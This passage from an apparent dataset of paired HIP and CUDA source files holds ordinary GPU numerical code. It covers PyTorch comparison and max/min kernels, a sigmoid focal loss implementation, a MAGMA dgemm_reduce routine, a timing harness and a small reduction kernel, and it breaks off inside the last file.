#include <ATen/AccumulateType.h> #include <ATen/Dispatch.h> #include <ATen/native/BinaryOps.h> #include <ATen/native/DispatchStub.h> #include <ATen/native/TensorIterator.h> #include <ATen/native/cuda/Loops.cuh> #include <ATen/native/cuda/zmath.cuh> // NOTE: CUDA on Windows requires that the enclosing function // of a __device__ lambda not have internal linkage. namespace at { namespace native { void lt_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "lt_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a < b; }); }); } void le_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "le_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a <= b; }); }); } void gt_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "gt_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a > b; }); }); } void ge_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "ge_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a >= b; }); }); } void eq_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND_COMPLEX_AND2(kHalf, kBool, iter.common_dtype(), "eq_cuda", [&]() { using thrust_t = typename ztype_cuda<scalar_t>::thrust_t; gpu_kernel_with_scalars(iter, []GPU_LAMBDA(thrust_t a, thrust_t b) -> bool { return a == b; }); }); } void ne_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND_COMPLEX_AND2(kHalf, kBool, iter.common_dtype(), "ne_cuda", [&]() { using thrust_t = typename ztype_cuda<scalar_t>::thrust_t; gpu_kernel_with_scalars(iter, []GPU_LAMBDA(thrust_t a, thrust_t b) -> bool { return a != b; }); }); } void max_elementwise_kernel_cuda(TensorIterator& iter) { if (iter.dtype() == ScalarType::Bool) { gpu_kernel(iter, []GPU_LAMBDA(bool a, bool b) -> bool { return a || b; }); } else if (isIntegralType(iter.dtype(), /*includeBool=*/ false)) { AT_DISPATCH_INTEGRAL_TYPES(iter.dtype(), "max_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { return ::max(a, b); }); }); } else { AT_DISPATCH_FLOATING_TYPES_AND_HALF(iter.dtype(), "max_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { // isnan(half) breaks the Windows build. We explicitly cast half to float. using acc_type = typename AccumulateType<scalar_t, /*is_cuda=*/true>::type; // We avoid using nan or nanf because we want to return the same type as scalar_t. if (::isnan(static_cast<acc_type>(a))) { return a; } else if (::isnan(static_cast<acc_type>(b))) { return b; } else { return ::max(a, b); } }); }); } } void min_elementwise_kernel_cuda(TensorIterator& iter) { if (iter.dtype() == ScalarType::Bool) { gpu_kernel(iter, []GPU_LAMBDA(bool a, bool b) -> bool { return a && b; }); } else if (isIntegralType(iter.dtype(), /*includeBool=*/ false)) { AT_DISPATCH_INTEGRAL_TYPES(iter.dtype(), "min_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { return ::min(a, b); }); }); } else { AT_DISPATCH_FLOATING_TYPES_AND_HALF(iter.dtype(), "min_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { // isnan(half) breaks the Windows build. We explicitly cast half to float. 
using acc_type = typename AccumulateType<scalar_t, /*is_cuda=*/true>::type; // We avoid using nan or nanf because we want to return the same type as scalar_t. if (::isnan(static_cast<acc_type>(a))) { return a; } else if (::isnan(static_cast<acc_type>(b))) { return b; } else { return ::min(a, b); } }); }); } } REGISTER_DISPATCH(lt_stub, &lt_kernel_cuda); REGISTER_DISPATCH(le_stub, &le_kernel_cuda); REGISTER_DISPATCH(gt_stub, &gt_kernel_cuda); REGISTER_DISPATCH(ge_stub, &ge_kernel_cuda); REGISTER_DISPATCH(eq_stub, &eq_kernel_cuda); REGISTER_DISPATCH(ne_stub, &ne_kernel_cuda); REGISTER_DISPATCH(max_elementwise_stub, &max_elementwise_kernel_cuda); REGISTER_DISPATCH(min_elementwise_stub, &min_elementwise_kernel_cuda); }} // namespace at::native
0289c43274d8fa234690dd96c08ff210439a0278.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" // modified from // https://github.com/facebookresearch/maskrcnn-benchmark/blob/master/maskrcnn_benchmark/csrc/cuda/SigmoidFocalLoss_cuda.cu // Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. // This file is modified from // https://github.com/pytorch/pytorch/blob/master/modules/detectron/sigmoid_focal_loss_op.cu // Cheng-Yang Fu // [email protected] #include <ATen/ATen.h> #include <ATen/hip/HIPContext.h> #include <THH/THH.h> #include <THH/THHAtomics.cuh> #include <THH/THHDeviceUtils.cuh> #include <cfloat> // TODO make it in a common file #define CUDA_1D_KERNEL_LOOP(i, n) \ for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < n; \ i += blockDim.x * gridDim.x) template <typename scalar_t> __global__ void SigmoidFocalLossForward(const int nthreads, const scalar_t *logits, const int64_t *targets, const int num_classes, const float gamma, const float alpha, const int num, scalar_t *losses) { CUDA_1D_KERNEL_LOOP(i, nthreads) { int n = i / num_classes; int d = i % num_classes; // current class[0~79]; int t = targets[n]; // target class [0~79]; // Decide it is positive or negative case. scalar_t c1 = (t == d); scalar_t c2 = (t >= 0 & t != d); scalar_t zn = (1.0 - alpha); scalar_t zp = (alpha); // p = 1. / 1. + expf(-x); p = sigmoid(x) scalar_t p = 1. / (1. + expf(-logits[i])); // (1-p)**gamma * log(p) where scalar_t term1 = powf((1. - p), gamma) * logf(max(p, FLT_MIN)); // p**gamma * log(1-p) scalar_t term2 = powf(p, gamma) * (-1. * logits[i] * (logits[i] >= 0) - logf(1. + expf(logits[i] - 2. * logits[i] * (logits[i] >= 0)))); losses[i] = 0.0; losses[i] += -c1 * term1 * zp; losses[i] += -c2 * term2 * zn; } // CUDA_1D_KERNEL_LOOP } // SigmoidFocalLossForward template <typename scalar_t> __global__ void SigmoidFocalLossBackward( const int nthreads, const scalar_t *logits, const int64_t *targets, const scalar_t *d_losses, const int num_classes, const float gamma, const float alpha, const int num, scalar_t *d_logits) { CUDA_1D_KERNEL_LOOP(i, nthreads) { int n = i / num_classes; int d = i % num_classes; // current class[0~79]; int t = targets[n]; // target class [0~79], 80 is background; // Decide it is positive or negative case. scalar_t c1 = (t == d); scalar_t c2 = (t >= 0 & t != d); scalar_t zn = (1.0 - alpha); scalar_t zp = (alpha); // p = 1. / 1. + expf(-x); p = sigmoid(x) scalar_t p = 1. / (1. + expf(-logits[i])); // (1-p)**g * (1 - p - g*p*log(p) scalar_t term1 = powf((1. - p), gamma) * (1. - p - (p * gamma * logf(max(p, FLT_MIN)))); // (p**g) * (g*(1-p)*log(1-p) - p) scalar_t term2 = powf(p, gamma) * ((-1. * logits[i] * (logits[i] >= 0) - logf(1. + expf(logits[i] - 2. * logits[i] * (logits[i] >= 0)))) * (1. 
- p) * gamma - p); d_logits[i] = 0.0; d_logits[i] += -c1 * term1 * zp; d_logits[i] += -c2 * term2 * zn; d_logits[i] = d_logits[i] * d_losses[i]; } // CUDA_1D_KERNEL_LOOP } // SigmoidFocalLossBackward at::Tensor SigmoidFocalLoss_forward_cuda(const at::Tensor &logits, const at::Tensor &targets, const int num_classes, const float gamma, const float alpha) { AT_ASSERTM(logits.device().is_cuda(), "logits must be a CUDA tensor"); AT_ASSERTM(targets.device().is_cuda(), "targets must be a CUDA tensor"); AT_ASSERTM(logits.dim() == 2, "logits should be NxClass"); AT_ASSERTM(targets.max().item<int64_t>() <= (int64_t)num_classes, "target label should smaller or equal than num classes"); const int num_samples = logits.size(0); auto losses = at::empty({num_samples, logits.size(1)}, logits.options()); auto losses_size = num_samples * logits.size(1); dim3 grid( ::min(THCCeilDiv((int64_t)losses_size, (int64_t)512), (int64_t)4096)); dim3 block(512); if (losses.numel() == 0) { THCudaCheck(hipGetLastError()); return losses; } AT_DISPATCH_FLOATING_TYPES_AND_HALF( logits.scalar_type(), "SigmoidFocalLoss_forward", [&] { hipLaunchKernelGGL(( SigmoidFocalLossForward<scalar_t>) , dim3(grid), dim3(block), 0, at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), losses_size, logits.contiguous().data_ptr<scalar_t>(), targets.contiguous().data_ptr<int64_t>(), num_classes, gamma, alpha, num_samples, losses.data_ptr<scalar_t>()); }); THCudaCheck(hipGetLastError()); return losses; } at::Tensor SigmoidFocalLoss_backward_cuda(const at::Tensor &logits, const at::Tensor &targets, const at::Tensor &d_losses, const int num_classes, const float gamma, const float alpha) { AT_ASSERTM(logits.device().is_cuda(), "logits must be a CUDA tensor"); AT_ASSERTM(targets.device().is_cuda(), "targets must be a CUDA tensor"); AT_ASSERTM(d_losses.device().is_cuda(), "d_losses must be a CUDA tensor"); AT_ASSERTM(logits.dim() == 2, "logits should be NxClass"); const int num_samples = logits.size(0); AT_ASSERTM(logits.size(1) == num_classes, "logits.size(1) should be num_classes"); auto d_logits = at::zeros({num_samples, num_classes}, logits.options()); auto d_logits_size = num_samples * logits.size(1); dim3 grid(::min(THCCeilDiv((int64_t)d_logits_size, (int64_t)512), (int64_t)4096)); dim3 block(512); if (d_logits.numel() == 0) { THCudaCheck(hipGetLastError()); return d_logits; } AT_DISPATCH_FLOATING_TYPES_AND_HALF( logits.scalar_type(), "SigmoidFocalLoss_backward", [&] { hipLaunchKernelGGL(( SigmoidFocalLossBackward<scalar_t>) , dim3(grid), dim3(block), 0, at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), d_logits_size, logits.contiguous().data_ptr<scalar_t>(), targets.contiguous().data_ptr<int64_t>(), d_losses.contiguous().data_ptr<scalar_t>(), num_classes, gamma, alpha, num_samples, d_logits.data_ptr<scalar_t>()); }); THCudaCheck(hipGetLastError()); return d_logits; }
0289c43274d8fa234690dd96c08ff210439a0278.cu
// modified from // https://github.com/facebookresearch/maskrcnn-benchmark/blob/master/maskrcnn_benchmark/csrc/cuda/SigmoidFocalLoss_cuda.cu // Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. // This file is modified from // https://github.com/pytorch/pytorch/blob/master/modules/detectron/sigmoid_focal_loss_op.cu // Cheng-Yang Fu // [email protected] #include <ATen/ATen.h> #include <ATen/cuda/CUDAContext.h> #include <THC/THC.h> #include <THC/THCAtomics.cuh> #include <THC/THCDeviceUtils.cuh> #include <cfloat> // TODO make it in a common file #define CUDA_1D_KERNEL_LOOP(i, n) \ for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < n; \ i += blockDim.x * gridDim.x) template <typename scalar_t> __global__ void SigmoidFocalLossForward(const int nthreads, const scalar_t *logits, const int64_t *targets, const int num_classes, const float gamma, const float alpha, const int num, scalar_t *losses) { CUDA_1D_KERNEL_LOOP(i, nthreads) { int n = i / num_classes; int d = i % num_classes; // current class[0~79]; int t = targets[n]; // target class [0~79]; // Decide it is positive or negative case. scalar_t c1 = (t == d); scalar_t c2 = (t >= 0 & t != d); scalar_t zn = (1.0 - alpha); scalar_t zp = (alpha); // p = 1. / 1. + expf(-x); p = sigmoid(x) scalar_t p = 1. / (1. + expf(-logits[i])); // (1-p)**gamma * log(p) where scalar_t term1 = powf((1. - p), gamma) * logf(max(p, FLT_MIN)); // p**gamma * log(1-p) scalar_t term2 = powf(p, gamma) * (-1. * logits[i] * (logits[i] >= 0) - logf(1. + expf(logits[i] - 2. * logits[i] * (logits[i] >= 0)))); losses[i] = 0.0; losses[i] += -c1 * term1 * zp; losses[i] += -c2 * term2 * zn; } // CUDA_1D_KERNEL_LOOP } // SigmoidFocalLossForward template <typename scalar_t> __global__ void SigmoidFocalLossBackward( const int nthreads, const scalar_t *logits, const int64_t *targets, const scalar_t *d_losses, const int num_classes, const float gamma, const float alpha, const int num, scalar_t *d_logits) { CUDA_1D_KERNEL_LOOP(i, nthreads) { int n = i / num_classes; int d = i % num_classes; // current class[0~79]; int t = targets[n]; // target class [0~79], 80 is background; // Decide it is positive or negative case. scalar_t c1 = (t == d); scalar_t c2 = (t >= 0 & t != d); scalar_t zn = (1.0 - alpha); scalar_t zp = (alpha); // p = 1. / 1. + expf(-x); p = sigmoid(x) scalar_t p = 1. / (1. + expf(-logits[i])); // (1-p)**g * (1 - p - g*p*log(p) scalar_t term1 = powf((1. - p), gamma) * (1. - p - (p * gamma * logf(max(p, FLT_MIN)))); // (p**g) * (g*(1-p)*log(1-p) - p) scalar_t term2 = powf(p, gamma) * ((-1. * logits[i] * (logits[i] >= 0) - logf(1. + expf(logits[i] - 2. * logits[i] * (logits[i] >= 0)))) * (1. 
- p) * gamma - p); d_logits[i] = 0.0; d_logits[i] += -c1 * term1 * zp; d_logits[i] += -c2 * term2 * zn; d_logits[i] = d_logits[i] * d_losses[i]; } // CUDA_1D_KERNEL_LOOP } // SigmoidFocalLossBackward at::Tensor SigmoidFocalLoss_forward_cuda(const at::Tensor &logits, const at::Tensor &targets, const int num_classes, const float gamma, const float alpha) { AT_ASSERTM(logits.device().is_cuda(), "logits must be a CUDA tensor"); AT_ASSERTM(targets.device().is_cuda(), "targets must be a CUDA tensor"); AT_ASSERTM(logits.dim() == 2, "logits should be NxClass"); AT_ASSERTM(targets.max().item<int64_t>() <= (int64_t)num_classes, "target label should smaller or equal than num classes"); const int num_samples = logits.size(0); auto losses = at::empty({num_samples, logits.size(1)}, logits.options()); auto losses_size = num_samples * logits.size(1); dim3 grid( std::min(THCCeilDiv((int64_t)losses_size, (int64_t)512), (int64_t)4096)); dim3 block(512); if (losses.numel() == 0) { THCudaCheck(cudaGetLastError()); return losses; } AT_DISPATCH_FLOATING_TYPES_AND_HALF( logits.scalar_type(), "SigmoidFocalLoss_forward", [&] { SigmoidFocalLossForward<scalar_t> <<<grid, block, 0, at::cuda::getCurrentCUDAStream()>>>( losses_size, logits.contiguous().data_ptr<scalar_t>(), targets.contiguous().data_ptr<int64_t>(), num_classes, gamma, alpha, num_samples, losses.data_ptr<scalar_t>()); }); THCudaCheck(cudaGetLastError()); return losses; } at::Tensor SigmoidFocalLoss_backward_cuda(const at::Tensor &logits, const at::Tensor &targets, const at::Tensor &d_losses, const int num_classes, const float gamma, const float alpha) { AT_ASSERTM(logits.device().is_cuda(), "logits must be a CUDA tensor"); AT_ASSERTM(targets.device().is_cuda(), "targets must be a CUDA tensor"); AT_ASSERTM(d_losses.device().is_cuda(), "d_losses must be a CUDA tensor"); AT_ASSERTM(logits.dim() == 2, "logits should be NxClass"); const int num_samples = logits.size(0); AT_ASSERTM(logits.size(1) == num_classes, "logits.size(1) should be num_classes"); auto d_logits = at::zeros({num_samples, num_classes}, logits.options()); auto d_logits_size = num_samples * logits.size(1); dim3 grid(std::min(THCCeilDiv((int64_t)d_logits_size, (int64_t)512), (int64_t)4096)); dim3 block(512); if (d_logits.numel() == 0) { THCudaCheck(cudaGetLastError()); return d_logits; } AT_DISPATCH_FLOATING_TYPES_AND_HALF( logits.scalar_type(), "SigmoidFocalLoss_backward", [&] { SigmoidFocalLossBackward<scalar_t> <<<grid, block, 0, at::cuda::getCurrentCUDAStream()>>>( d_logits_size, logits.contiguous().data_ptr<scalar_t>(), targets.contiguous().data_ptr<int64_t>(), d_losses.contiguous().data_ptr<scalar_t>(), num_classes, gamma, alpha, num_samples, d_logits.data_ptr<scalar_t>()); }); THCudaCheck(cudaGetLastError()); return d_logits; }
0ac833f77183acea92eb6274a5f8be73a6773c06.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* -- MAGMA (version 2.1.0) -- Univ. of Tennessee, Knoxville Univ. of California, Berkeley Univ. of Colorado, Denver @date August 2016 @generated from magmablas/zgemm_reduce.cu, normal z -> d, Tue Aug 30 09:38:28 2016 */ #include "magma_internal.h" #include "magma_templates.h" // size of work for a thread block #define BLK_M 16 #define BLK_N 16 // BLK_K gets defined in magmablas_dgemm_reduce, // because it depends on the CUDA architecture at runtime. /******************************************************************************/ // BLK_K size is templated, as it depends on CUDA architecture at runtime. // Hmm... how to compile for both CUDA arch 1.x and 2.x? template< int BLK_K > __global__ void dgemm_reduce_kernel( int m, int n, int k, double alpha, const double* __restrict__ dA, int lda, const double* __restrict__ dB, int ldb, double beta, double * __restrict__ dC, int ldc) { #if (__CUDA_ARCH__ >= 200) const int tx = threadIdx.x; if (blockIdx.x*BLK_M + threadIdx.y < m && blockIdx.y*BLK_N + threadIdx.z < n) { dA += (blockIdx.x*BLK_M + threadIdx.y) * lda; dB += (blockIdx.y*BLK_N + threadIdx.z) * ldb; dC += blockIdx.x*BLK_M + blockIdx.y*BLK_N * ldc; // was: sum[BLK_M][BLK_N+1][BLK_K+1]; // moved 3rd dimension to 1st dimension to make magma_sum_reduce_3d interface nicer. __shared__ double sum[BLK_K][BLK_M+1][BLK_N+1]; double lsum; /* w := v**H * C */ lsum = MAGMA_D_ZERO; for( int j = tx; j < k; j += BLK_K ) lsum += MAGMA_D_CONJ( dA[j] )* dB[j]; sum[tx][threadIdx.y][threadIdx.z] = lsum; magma_sum_reduce_3d< BLK_K, BLK_M+1, BLK_N+1 >( tx, threadIdx.y, threadIdx.z, sum ); /* C := C - v * w */ __syncthreads(); if (threadIdx.x == 0) { if (MAGMA_D_EQUAL(beta, MAGMA_D_ZERO)) dC[threadIdx.y + threadIdx.z*ldc] = alpha*sum[0][threadIdx.y][threadIdx.z]; else dC[threadIdx.y + threadIdx.z*ldc] = beta* dC[threadIdx.y + threadIdx.z*ldc] + alpha*sum[0][threadIdx.y][threadIdx.z]; } } #endif } /***************************************************************************//** Purpose ------- DGEMM_REDUCE performs one of the matrix-matrix operations C := alpha*A^T*B + beta*C, where alpha and beta are scalars, and A, B and C are matrices, with A a k-by-m matrix, B a k-by-n matrix, and C an m-by-n matrix. This routine is tuned for m, n << k. Typically, m and n are expected to be less than 128. 
@ingroup magma_gemm *******************************************************************************/ extern "C" void magmablas_dgemm_reduce_q( magma_int_t m, magma_int_t n, magma_int_t k, double alpha, magmaDouble_const_ptr dA, magma_int_t ldda, magmaDouble_const_ptr dB, magma_int_t lddb, double beta, magmaDouble_ptr dC, magma_int_t lddc, magma_queue_t queue ) { magma_int_t info = 0; if ( m < 0 ) info = -1; else if ( n < 0 ) info = -2; else if ( k < 0 ) info = -3; else if ( ldda < m ) info = -6; else if ( lddb < k ) info = -8; else if ( lddc < m ) info = -11; if (info != 0) { magma_xerbla( __func__, -(info) ); return; //info; } magma_int_t arch = magma_getdevice_arch(); if ( arch < 200 ) { // -------------------- // call CUDA ARCH 1.x -- maximum 512 threads const int NUM_THREADS = 512; const int BLK_K = (NUM_THREADS / (BLK_M * BLK_N)); // == 2 dim3 threads( BLK_K, BLK_M, BLK_N ); dim3 blocks( magma_ceildiv( m, BLK_M ), magma_ceildiv( n, BLK_N ), 1 ); hipLaunchKernelGGL(( dgemm_reduce_kernel<BLK_K>) , dim3(blocks), dim3(threads), 0, queue->cuda_stream() , m, n, k, alpha, dA, ldda, dB, lddb, beta, dC, lddc ); } else { // -------------------- // call CUDA ARCH 2.x -- maximum 1024 threads const int NUM_THREADS = 1024; const int BLK_K = (NUM_THREADS / (BLK_M * BLK_N)); // == 4 dim3 threads( BLK_K, BLK_M, BLK_N ); dim3 blocks( magma_ceildiv( m, BLK_M ), magma_ceildiv( n, BLK_N ), 1 ); hipLaunchKernelGGL(( dgemm_reduce_kernel<BLK_K>) , dim3(blocks), dim3(threads), 0, queue->cuda_stream() , m, n, k, alpha, dA, ldda, dB, lddb, beta, dC, lddc ); } }
0ac833f77183acea92eb6274a5f8be73a6773c06.cu
/* -- MAGMA (version 2.1.0) -- Univ. of Tennessee, Knoxville Univ. of California, Berkeley Univ. of Colorado, Denver @date August 2016 @generated from magmablas/zgemm_reduce.cu, normal z -> d, Tue Aug 30 09:38:28 2016 */ #include "magma_internal.h" #include "magma_templates.h" // size of work for a thread block #define BLK_M 16 #define BLK_N 16 // BLK_K gets defined in magmablas_dgemm_reduce, // because it depends on the CUDA architecture at runtime. /******************************************************************************/ // BLK_K size is templated, as it depends on CUDA architecture at runtime. // Hmm... how to compile for both CUDA arch 1.x and 2.x? template< int BLK_K > __global__ void dgemm_reduce_kernel( int m, int n, int k, double alpha, const double* __restrict__ dA, int lda, const double* __restrict__ dB, int ldb, double beta, double * __restrict__ dC, int ldc) { #if (__CUDA_ARCH__ >= 200) const int tx = threadIdx.x; if (blockIdx.x*BLK_M + threadIdx.y < m && blockIdx.y*BLK_N + threadIdx.z < n) { dA += (blockIdx.x*BLK_M + threadIdx.y) * lda; dB += (blockIdx.y*BLK_N + threadIdx.z) * ldb; dC += blockIdx.x*BLK_M + blockIdx.y*BLK_N * ldc; // was: sum[BLK_M][BLK_N+1][BLK_K+1]; // moved 3rd dimension to 1st dimension to make magma_sum_reduce_3d interface nicer. __shared__ double sum[BLK_K][BLK_M+1][BLK_N+1]; double lsum; /* w := v**H * C */ lsum = MAGMA_D_ZERO; for( int j = tx; j < k; j += BLK_K ) lsum += MAGMA_D_CONJ( dA[j] )* dB[j]; sum[tx][threadIdx.y][threadIdx.z] = lsum; magma_sum_reduce_3d< BLK_K, BLK_M+1, BLK_N+1 >( tx, threadIdx.y, threadIdx.z, sum ); /* C := C - v * w */ __syncthreads(); if (threadIdx.x == 0) { if (MAGMA_D_EQUAL(beta, MAGMA_D_ZERO)) dC[threadIdx.y + threadIdx.z*ldc] = alpha*sum[0][threadIdx.y][threadIdx.z]; else dC[threadIdx.y + threadIdx.z*ldc] = beta* dC[threadIdx.y + threadIdx.z*ldc] + alpha*sum[0][threadIdx.y][threadIdx.z]; } } #endif } /***************************************************************************//** Purpose ------- DGEMM_REDUCE performs one of the matrix-matrix operations C := alpha*A^T*B + beta*C, where alpha and beta are scalars, and A, B and C are matrices, with A a k-by-m matrix, B a k-by-n matrix, and C an m-by-n matrix. This routine is tuned for m, n << k. Typically, m and n are expected to be less than 128. 
@ingroup magma_gemm *******************************************************************************/ extern "C" void magmablas_dgemm_reduce_q( magma_int_t m, magma_int_t n, magma_int_t k, double alpha, magmaDouble_const_ptr dA, magma_int_t ldda, magmaDouble_const_ptr dB, magma_int_t lddb, double beta, magmaDouble_ptr dC, magma_int_t lddc, magma_queue_t queue ) { magma_int_t info = 0; if ( m < 0 ) info = -1; else if ( n < 0 ) info = -2; else if ( k < 0 ) info = -3; else if ( ldda < m ) info = -6; else if ( lddb < k ) info = -8; else if ( lddc < m ) info = -11; if (info != 0) { magma_xerbla( __func__, -(info) ); return; //info; } magma_int_t arch = magma_getdevice_arch(); if ( arch < 200 ) { // -------------------- // call CUDA ARCH 1.x -- maximum 512 threads const int NUM_THREADS = 512; const int BLK_K = (NUM_THREADS / (BLK_M * BLK_N)); // == 2 dim3 threads( BLK_K, BLK_M, BLK_N ); dim3 blocks( magma_ceildiv( m, BLK_M ), magma_ceildiv( n, BLK_N ), 1 ); dgemm_reduce_kernel<BLK_K> <<< blocks, threads, 0, queue->cuda_stream() >>> ( m, n, k, alpha, dA, ldda, dB, lddb, beta, dC, lddc ); } else { // -------------------- // call CUDA ARCH 2.x -- maximum 1024 threads const int NUM_THREADS = 1024; const int BLK_K = (NUM_THREADS / (BLK_M * BLK_N)); // == 4 dim3 threads( BLK_K, BLK_M, BLK_N ); dim3 blocks( magma_ceildiv( m, BLK_M ), magma_ceildiv( n, BLK_N ), 1 ); dgemm_reduce_kernel<BLK_K> <<< blocks, threads, 0, queue->cuda_stream() >>> ( m, n, k, alpha, dA, ldda, dB, lddb, beta, dC, lddc ); } }
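For reference, a host-side driver for the routine above might look like the sketch below. It exercises C := alpha*A^T*B + beta*C with m, n << k, the shape the Purpose section says the kernel is tuned for. The sizes, the hA/hB/hC host buffers, the magma_v2.h include, and the MAGMA 2.x helper calls (magma_init, magma_queue_create, magma_dmalloc, magma_dsetmatrix/magma_dgetmatrix) are assumptions for illustration, not taken from the files in this pair.

// Hypothetical driver for magmablas_dgemm_reduce_q; sizes and helpers are assumed, not from the file above.
#include "magma_v2.h"   // assumed public header for the MAGMA 2.x host API
#include <vector>

int main() {
    magma_init();
    magma_queue_t queue;
    magma_queue_create(0 /* device */, &queue);

    // A is k-by-m, B is k-by-n, C is m-by-n; the routine is tuned for m, n << k.
    magma_int_t m = 32, n = 32, k = 4096;
    magma_int_t ldda = k, lddb = k, lddc = m;   // leading dimensions on the device

    std::vector<double> hA(ldda * m, 1.0), hB(lddb * n, 1.0), hC(lddc * n, 0.0);
    magmaDouble_ptr dA, dB, dC;
    magma_dmalloc(&dA, ldda * m);
    magma_dmalloc(&dB, lddb * n);
    magma_dmalloc(&dC, lddc * n);
    magma_dsetmatrix(k, m, hA.data(), ldda, dA, ldda, queue);
    magma_dsetmatrix(k, n, hB.data(), lddb, dB, lddb, queue);
    magma_dsetmatrix(m, n, hC.data(), lddc, dC, lddc, queue);

    // C := 1.0 * A^T * B + 0.0 * C; with all-ones inputs every entry of C should equal k.
    magmablas_dgemm_reduce_q(m, n, k, 1.0, dA, ldda, dB, lddb, 0.0, dC, lddc, queue);
    magma_dgetmatrix(m, n, dC, lddc, hC.data(), lddc, queue);

    magma_free(dA); magma_free(dB); magma_free(dC);
    magma_queue_destroy(queue);
    magma_finalize();
    return 0;
}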
1333508a9bb9ab4689605749d5bb01d1353e8911.hip
// !!! This is a file automatically generated by hipify!!! #include "mesh.h" #include "scattering.h" #include "potential.h" #include "computeTMatrix.h" #include "solveLS.h" #include <fstream> #include <iomanip> #include <hip/hip_runtime.h> #include <hip/hip_runtime.h> #include <hiprand/hiprand_kernel.h> #include <hip/hip_complex.h> #include <chrono> void datainsamling() { /* std::ofstream myfile; myfile.open("data.csv"); myfile << "Real av fasskift"; myfile << ","; myfile << "N"; myfile << "\n"; */ for (int i = 0; i < 5; i++) { using milli = std::chrono::microseconds; auto start = std::chrono::high_resolution_clock::now(); solveLS(); auto finish = std::chrono::high_resolution_clock::now(); std::cout << "myFunction() took " << std::chrono::duration_cast<milli>(finish - start).count() << " milliseconds\n"; } } int main() { datainsamling(); return 0; }
1333508a9bb9ab4689605749d5bb01d1353e8911.cu
#include "mesh.h" #include "scattering.h" #include "potential.h" #include "computeTMatrix.h" #include "solveLS.h" #include <fstream> #include <iomanip> #include <cuda.h> #include <cuda_runtime.h> #include <curand_kernel.h> #include <cuComplex.h> #include <chrono> void datainsamling() { /* std::ofstream myfile; myfile.open("data.csv"); myfile << "Real av fasskift"; myfile << ","; myfile << "N"; myfile << "\n"; */ for (int i = 0; i < 5; i++) { using milli = std::chrono::microseconds; auto start = std::chrono::high_resolution_clock::now(); solveLS(); auto finish = std::chrono::high_resolution_clock::now(); std::cout << "myFunction() took " << std::chrono::duration_cast<milli>(finish - start).count() << " milliseconds\n"; } } int main() { datainsamling(); return 0; }
1e53ebd6436077871184634c40c1e506ba7fd221.hip
// !!! This is a file automatically generated by hipify!!!
#include <stdio.h>
#include <assert.h>
#include <hip/hip_runtime.h>
#include <hip/hip_runtime.h>

#define BLOCK_SIZE 256  // added: the kernel used BLOCK_SIZE but never defined it

__global__ void reduce(int* inData, int* outData)
{
    __shared__ int data[BLOCK_SIZE];
    int threadId = threadIdx.x;                 // fixed typo: was threadIsx.x
    int i = blockIdx.x * blockDim.x + threadId;
    data[threadId] = inData[i];
    __syncthreads();
    for (int s = blockDim.x / 2; s > 0; s >>= 1)
    {
        if (threadId < s) {                     // fixed: 'tid' was never declared
            data[threadId] += data[threadId + s];
        }
        __syncthreads();
    }
    if (threadId == 0) {
        outData[blockIdx.x] = data[0];
    }
}

int main( int argc, char** argv )
{
    // The original main launched an undefined kernel 'test' with no arguments;
    // launch the reduction on one block of zero-initialised data instead.
    int *dIn = NULL, *dOut = NULL;
    hipMalloc((void**)&dIn, BLOCK_SIZE * sizeof(int));
    hipMalloc((void**)&dOut, sizeof(int));
    hipMemset(dIn, 0, BLOCK_SIZE * sizeof(int));
    hipLaunchKernelGGL(reduce, dim3(1), dim3(BLOCK_SIZE), 0, 0, dIn, dOut);
    hipDeviceSynchronize();
    hipFree(dIn);
    hipFree(dOut);
    return 0;
}
1e53ebd6436077871184634c40c1e506ba7fd221.cu
#include <stdio.h>
#include <assert.h>
#include <cuda.h>
#include <cuda_runtime.h>

#define BLOCK_SIZE 256  // added: the kernel used BLOCK_SIZE but never defined it

__global__ void reduce(int* inData, int* outData)
{
    __shared__ int data[BLOCK_SIZE];
    int threadId = threadIdx.x;                 // fixed typo: was threadIsx.x
    int i = blockIdx.x * blockDim.x + threadId;
    data[threadId] = inData[i];
    __syncthreads();
    for (int s = blockDim.x / 2; s > 0; s >>= 1)
    {
        if (threadId < s) {                     // fixed: 'tid' was never declared
            data[threadId] += data[threadId + s];
        }
        __syncthreads();
    }
    if (threadId == 0) {
        outData[blockIdx.x] = data[0];
    }
}

int main( int argc, char** argv )
{
    // The original main launched an undefined kernel 'test' with no arguments;
    // launch the reduction on one block of zero-initialised data instead.
    int *dIn = NULL, *dOut = NULL;
    cudaMalloc((void**)&dIn, BLOCK_SIZE * sizeof(int));
    cudaMalloc((void**)&dOut, sizeof(int));
    cudaMemset(dIn, 0, BLOCK_SIZE * sizeof(int));
    reduce<<<1, BLOCK_SIZE>>>(dIn, dOut);       // was: test<<<1,1>>>(), which is undefined
